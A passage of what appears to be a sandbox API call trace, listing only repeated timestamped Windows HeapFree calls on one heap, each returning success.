hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4620fa0 | out: hHeap=0x6a0000) returned 1 [0174.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0175.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0175.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0175.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4620fa0 | out: hHeap=0x6a0000) returned 1 [0175.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4620fa0 | out: hHeap=0x6a0000) returned 1 [0175.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0175.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0175.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0175.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0175.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0175.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0175.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0175.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0175.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0175.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0175.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0175.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0175.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0175.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0175.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0175.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0175.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0175.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0175.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0175.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0175.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.661] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.661] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0175.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0175.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0175.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0175.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0175.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0175.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0175.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0175.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.704] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0175.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0176.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0176.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0176.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0176.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0176.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5141060 | out: hHeap=0x6a0000) returned 1 [0176.413] HeapFree (in: 